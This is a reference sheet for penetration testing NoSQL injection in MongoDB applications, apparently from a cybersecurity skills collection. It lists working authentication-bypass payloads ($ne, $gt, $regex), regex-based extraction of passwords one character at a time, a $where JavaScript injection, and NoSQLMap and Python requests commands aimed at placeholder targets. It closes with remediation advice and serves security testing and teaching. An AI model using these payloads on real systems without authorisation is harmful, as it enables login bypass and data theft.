Anthropic-Cybersecurity-Skills/skills/exploiting-nosql-injection-vulnerabilities/references/api-reference.md

API Reference: NoSQL Injection Testing

MongoDB Query Operators

Operator	Description	Injection Use
$ne	Not equal	Bypass authentication
$gt	Greater than	Extract data
$regex	Regular expression	Pattern matching
$exists	Field exists	Enumerate fields
$where	JavaScript expression	Code execution
$or	Logical OR	Logic bypass

Authentication Bypass Payloads

GET Parameters

?username[$ne]=&password[$ne]=
?username=admin&password[$gt]=
?username[$regex]=admin.*&password[$ne]=

JSON Body

{"username": {"$ne": ""}, "password": {"$ne": ""}}
{"username": "admin", "password": {"$gt": ""}}
{"username": {"$regex": "^admin"}, "password": {"$ne": ""}}

Data Extraction

Regex-Based Extraction

{"username": {"$regex": "^a"}, "password": {"$ne": ""}}
{"username": {"$regex": "^ad"}, "password": {"$ne": ""}}
{"username": {"$regex": "^adm"}, "password": {"$ne": ""}}

$where JavaScript Injection

{"$where": "this.username == 'admin' && this.password.match(/^a/)"}

Error-Based Detection

MongoDB Error Messages

Error	Indicator
MongoError	MongoDB driver error
CastError	Invalid ObjectId
BSONTypeError	Invalid BSON type
SyntaxError	JavaScript parse error

Testing Tools

NoSQLMap

python nosqlmap.py --url http://target/api/login --method POST \
    --data '{"username":"test","password":"test"}'

Burp Suite Intruder

Use NoSQL payload wordlist with parameter fuzzing.

Python requests Testing

GET Injection

import requests
url = "http://target/api/users"
resp = requests.get(f"{url}?username[$ne]=&password[$ne]=")

JSON Injection

payload = {"username": {"$ne": ""}, "password": {"$ne": ""}}
resp = requests.post(url, json=payload)

Remediation

1. Use parameterized queries (never concatenate user input)
2. Validate input types (reject objects where strings expected)
3. Use mongo-sanitize or equivalent input sanitization
4. Disable $where operator if not needed
5. Implement proper authentication (don't rely on query-level checks)